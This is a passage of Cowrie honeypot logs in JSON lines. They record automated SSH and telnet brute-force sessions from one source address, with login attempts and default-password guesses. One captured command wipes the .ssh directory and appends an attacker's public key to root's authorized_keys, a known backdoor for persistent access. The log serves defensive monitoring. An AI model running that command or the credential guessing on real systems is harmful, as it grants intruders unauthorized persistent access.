{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:55:26.861520Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:55:27.471134Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T04:55:27.471974Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:55:28.231681Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.closed","duration":"38.6","message":"Connection lost after 38.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:55:28.233006Z","src_ip":"212.227.235.229","session":"f966f248df03"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54990,"dst_ip":"1.2.3.4","dst_port":23,"session":"8f608fbe5b22","protocol":"telnet","message":"New connection: 212.227.235.229:54990 (1.2.3.4:23) [session: 8f608fbe5b22]","sensor":"my-vps","timestamp":"2025-08-26T04:55:28.965062Z"}
{"eventid":"cowrie.session.closed","duration":10.000163555145264,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:55:38.965147Z","src_ip":"212.227.235.229","session":"8f608fbe5b22"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41714,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3bcce637d35","protocol":"ssh","message":"New connection: 212.227.235.229:41714 (1.2.3.4:22) [session: a3bcce637d35]","sensor":"my-vps","timestamp":"2025-08-26T04:56:06.759776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:56:06.760714Z","src_ip":"212.227.235.229","session":"a3bcce637d35"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:56:07.029181Z","src_ip":"212.227.235.229","session":"a3bcce637d35"}
{"eventid":"cowrie.login.success","username":"root","password":"nexus@123","message":"login attempt [root/nexus@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:56:08.145004Z","src_ip":"212.227.235.229","session":"a3bcce637d35"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:56:08.707212Z","src_ip":"212.227.235.229","session":"a3bcce637d35"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:56:08.708557Z","src_ip":"212.227.235.229","session":"a3bcce637d35"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:56:08.709722Z","src_ip":"212.227.235.229","session":"a3bcce637d35"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:56:08.980124Z","src_ip":"212.227.235.229","session":"a3bcce637d35"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:56:09.624710Z","src_ip":"212.227.235.229","session":"a3bcce637d35"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:56:09.625387Z","src_ip":"212.227.235.229","session":"a3bcce637d35"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:56:09.896863Z","src_ip":"212.227.235.229","session":"a3bcce637d35"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:56:09.897784Z","src_ip":"212.227.235.229","session":"a3bcce637d35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41720,"dst_ip":"1.2.3.4","dst_port":22,"session":"678dd0d79be7","protocol":"ssh","message":"New connection: 212.227.235.229:41720 (1.2.3.4:22) [session: 678dd0d79be7]","sensor":"my-vps","timestamp":"2025-08-26T04:56:10.165421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:56:10.166089Z","src_ip":"212.227.235.229","session":"678dd0d79be7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:56:10.435921Z","src_ip":"212.227.235.229","session":"678dd0d79be7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:56:11.556325Z","src_ip":"212.227.235.229","session":"678dd0d79be7"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:56:12.827936Z","src_ip":"212.227.235.229","session":"678dd0d79be7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54370,"dst_ip":"1.2.3.4","dst_port":22,"session":"85dfce03a12a","protocol":"ssh","message":"New connection: 212.227.235.229:54370 (1.2.3.4:22) [session: 85dfce03a12a]","sensor":"my-vps","timestamp":"2025-08-26T04:56:13.096221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:56:13.096895Z","src_ip":"212.227.235.229","session":"85dfce03a12a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:56:13.365885Z","src_ip":"212.227.235.229","session":"85dfce03a12a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:56:14.481115Z","src_ip":"212.227.235.229","session":"85dfce03a12a"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:56:14.752114Z","src_ip":"212.227.235.229","session":"a3bcce637d35"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:56:14.752957Z","src_ip":"212.227.235.229","session":"85dfce03a12a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54958,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff3814331f22","protocol":"ssh","message":"New connection: 212.227.235.229:54958 (1.2.3.4:22) [session: ff3814331f22]","sensor":"my-vps","timestamp":"2025-08-26T04:56:23.421826Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:56:23.422907Z","src_ip":"212.227.235.229","session":"ff3814331f22"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59014,"dst_ip":"1.2.3.4","dst_port":23,"session":"c9db425c9aa9","protocol":"telnet","message":"New connection: 212.227.235.229:59014 (1.2.3.4:23) [session: c9db425c9aa9]","sensor":"my-vps","timestamp":"2025-08-26T04:56:23.619589Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T04:56:24.421316Z","src_ip":"212.227.235.229","session":"c9db425c9aa9"}
{"eventid":"cowrie.session.closed","duration":3.9067270755767822,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:56:27.526233Z","src_ip":"212.227.235.229","session":"c9db425c9aa9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53806,"dst_ip":"1.2.3.4","dst_port":23,"session":"fd669ceacf51","protocol":"telnet","message":"New connection: 212.227.235.229:53806 (1.2.3.4:23) [session: fd669ceacf51]","sensor":"my-vps","timestamp":"2025-08-26T04:56:27.890368Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:56:28.684481Z","src_ip":"212.227.235.229","session":"fd669ceacf51"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:56:28.704823Z","src_ip":"212.227.235.229","session":"fd669ceacf51"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:56:29.425657Z","src_ip":"212.227.235.229","session":"ff3814331f22"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:56:29.428125Z","src_ip":"212.227.235.229","session":"ff3814331f22"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"3.1","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:56:31.768663Z","src_ip":"212.227.235.229","session":"fd669ceacf51"}
{"eventid":"cowrie.session.closed","duration":3.8834145069122314,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:56:31.773715Z","src_ip":"212.227.235.229","session":"fd669ceacf51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36208,"dst_ip":"1.2.3.4","dst_port":23,"session":"91fe312e65ef","protocol":"telnet","message":"New connection: 212.227.235.229:36208 (1.2.3.4:23) [session: 91fe312e65ef]","sensor":"my-vps","timestamp":"2025-08-26T04:56:55.477094Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T04:56:55.846395Z","src_ip":"212.227.235.229","session":"91fe312e65ef"}
{"eventid":"cowrie.session.closed","duration":2.415649175643921,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:56:57.892646Z","src_ip":"212.227.235.229","session":"91fe312e65ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38134,"dst_ip":"1.2.3.4","dst_port":23,"session":"e3cb05e4fee0","protocol":"telnet","message":"New connection: 212.227.235.229:38134 (1.2.3.4:23) [session: e3cb05e4fee0]","sensor":"my-vps","timestamp":"2025-08-26T04:56:58.036617Z"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:56:58.778435Z","src_ip":"212.227.235.229","session":"45a7bc9eec0f"}
{"eventid":"cowrie.session.closed","duration":5.336711168289185,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:57:03.373260Z","src_ip":"212.227.235.229","session":"e3cb05e4fee0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38150,"dst_ip":"1.2.3.4","dst_port":23,"session":"706e11067f98","protocol":"telnet","message":"New connection: 212.227.235.229:38150 (1.2.3.4:23) [session: 706e11067f98]","sensor":"my-vps","timestamp":"2025-08-26T04:57:03.514120Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53838,"dst_ip":"1.2.3.4","dst_port":23,"session":"6806a0402e63","protocol":"telnet","message":"New connection: 212.227.125.160:53838 (1.2.3.4:23) [session: 6806a0402e63]","sensor":"my-vps","timestamp":"2025-08-26T04:57:03.541155Z"}
{"eventid":"cowrie.session.closed","duration":0.0011878013610839844,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:57:03.542272Z","src_ip":"212.227.125.160","session":"6806a0402e63"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:57:03.848879Z","src_ip":"212.227.235.229","session":"706e11067f98"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:57:03.900479Z","src_ip":"212.227.235.229","session":"706e11067f98"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T04:57:04.095290Z","src_ip":"212.227.235.229","session":"706e11067f98"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:57:05.207697Z","src_ip":"212.227.235.229","session":"706e11067f98"}
{"eventid":"cowrie.session.closed","duration":1.698866844177246,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:57:05.212916Z","src_ip":"212.227.235.229","session":"706e11067f98"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37504,"dst_ip":"1.2.3.4","dst_port":23,"session":"425e0bf1e238","protocol":"telnet","message":"New connection: 212.227.235.229:37504 (1.2.3.4:23) [session: 425e0bf1e238]","sensor":"my-vps","timestamp":"2025-08-26T04:57:22.819449Z"}
{"eventid":"cowrie.session.closed","duration":0.0012745857238769531,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:57:22.820650Z","src_ip":"212.227.235.229","session":"425e0bf1e238"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50298,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9dab86aa987","protocol":"ssh","message":"New connection: 212.227.235.229:50298 (1.2.3.4:22) [session: e9dab86aa987]","sensor":"my-vps","timestamp":"2025-08-26T04:57:23.273908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:57:23.274750Z","src_ip":"212.227.235.229","session":"e9dab86aa987"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:57:23.543164Z","src_ip":"212.227.235.229","session":"e9dab86aa987"}
{"eventid":"cowrie.login.failed","username":"luis","password":"12345678","message":"login attempt [luis/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T04:57:24.660408Z","src_ip":"212.227.235.229","session":"e9dab86aa987"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:57:25.932099Z","src_ip":"212.227.235.229","session":"e9dab86aa987"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59902,"dst_ip":"1.2.3.4","dst_port":23,"session":"12f4c352ef32","protocol":"telnet","message":"New connection: 212.227.125.160:59902 (1.2.3.4:23) [session: 12f4c352ef32]","sensor":"my-vps","timestamp":"2025-08-26T04:57:30.736271Z"}
{"eventid":"cowrie.session.closed","duration":10.120311975479126,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:57:40.856509Z","src_ip":"212.227.125.160","session":"12f4c352ef32"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50672,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2ad5732693a","protocol":"ssh","message":"New connection: 212.227.235.229:50672 (1.2.3.4:22) [session: d2ad5732693a]","sensor":"my-vps","timestamp":"2025-08-26T04:57:51.549733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:57:51.550738Z","src_ip":"212.227.235.229","session":"d2ad5732693a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35594,"dst_ip":"1.2.3.4","dst_port":23,"session":"c68145df8a6d","protocol":"telnet","message":"New connection: 212.227.235.229:35594 (1.2.3.4:23) [session: c68145df8a6d]","sensor":"my-vps","timestamp":"2025-08-26T04:57:56.065020Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-